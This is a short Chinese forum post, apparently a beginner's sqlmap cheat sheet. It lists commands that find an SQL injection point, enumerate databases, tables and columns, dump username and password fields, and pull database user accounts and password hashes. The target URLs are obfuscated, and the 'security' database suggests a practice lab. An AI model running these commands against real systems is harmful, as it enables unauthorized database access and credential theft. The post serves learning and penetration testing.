小白路过，大佬勿喷！！！

--batch可以不用交互默认进行

检测注入点

sqlmap.py -u 61cK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5H3i4K6u0W2x3U0b7H3i4K6u0W2y4q4)9J5k6e0t1I4x3#2)9J5c8Y4y4I4L8q4)9J5c8V1I4W2M7%4y4Q4x3X3b7K6i4K6u0r3i4K6y4r3K9h3c8Q4x3@1b7I4

查看所有数据库

sqlmap.py -u b5bK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5H3i4K6u0W2x3U0b7H3i4K6u0W2y4q4)9J5k6e0t1I4x3#2)9J5c8Y4y4I4L8q4)9J5c8V1I4W2M7%4y4Q4x3X3b7K6i4K6u0r3i4K6y4r3K9h3c8Q4x3@1b7I4 --dbs

查看当前数据库

sqlmap.py -u cebK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5H3i4K6u0W2x3U0b7H3i4K6u0W2y4q4)9J5k6e0t1I4x3#2)9J5c8Y4y4I4L8q4)9J5c8V1I4W2M7%4y4Q4x3X3b7K6i4K6u0r3i4K6y4r3K9h3c8Q4x3@1b7I4 --current-db --batch

列出数据库中的表

sqlmap.py -u 6a5K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5H3i4K6u0W2x3U0b7H3i4K6u0W2y4q4)9J5k6e0t1I4x3#2)9J5c8Y4y4I4L8q4)9J5c8V1I4W2M7%4y4Q4x3X3b7K6i4K6u0r3i4K6y4r3K9h3c8Q4x3@1b7I4 -D security --tables --batch

-D 指定数据库名

--tables 列出表

列出表中字段

sqlmap.py -u 5ddK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5H3i4K6u0W2x3U0b7H3i4K6u0W2y4q4)9J5k6e0t1I4x3#2)9J5c8Y4y4I4L8q4)9J5c8V1I4W2M7%4y4Q4x3X3b7K6i4K6u0r3i4K6y4r3K9h3c8Q4x3@1b7I4 -D security -T users --columns --batch

sqlmap.py -u abfK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5H3i4K6u0W2x3U0b7H3i4K6u0W2y4q4)9J5k6e0t1I4x3#2)9J5c8Y4y4I4L8q4)9J5c8V1I4W2M7%4y4Q4x3X3b7K6i4K6u0r3i4K6y4r3K9h3c8Q4x3@1b7I4 -D security -T users -C "username,password" --dump --batch

-C 指定的字段

--dump 将结果导出

当前数据库使用账户

sqlmap.py -u d72K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5H3i4K6u0W2x3U0b7H3i4K6u0W2y4q4)9J5k6e0t1I4x3#2)9J5c8Y4y4I4L8q4)9J5c8V1I4W2M7%4y4Q4x3X3b7K6i4K6u0r3i4K6y4r3K9h3c8Q4x3@1b7I4 --current-user --batch

列出数据库所有用户

sqlmap.py -u 3f6K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5H3i4K6u0W2x3U0b7H3i4K6u0W2y4q4)9J5k6e0t1I4x3#2)9J5c8Y4y4I4L8q4)9J5c8V1I4W2M7%4y4Q4x3X3b7K6i4K6u0r3i4K6y4r3K9h3c8Q4x3@1b7I4 --users --batch

获取数据库账户密码

sqlmap.py -u b3eK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5H3i4K6u0W2x3U0b7H3i4K6u0W2y4q4)9J5k6e0t1I4x3#2)9J5c8Y4y4I4L8q4)9J5c8V1I4W2M7%4y4Q4x3X3b7K6i4K6u0r3i4K6y4r3K9h3c8Q4x3@1b7I4 --passwords --batch

[培训]科锐软件逆向54期预科班、正式班开始火爆招生报名啦！！！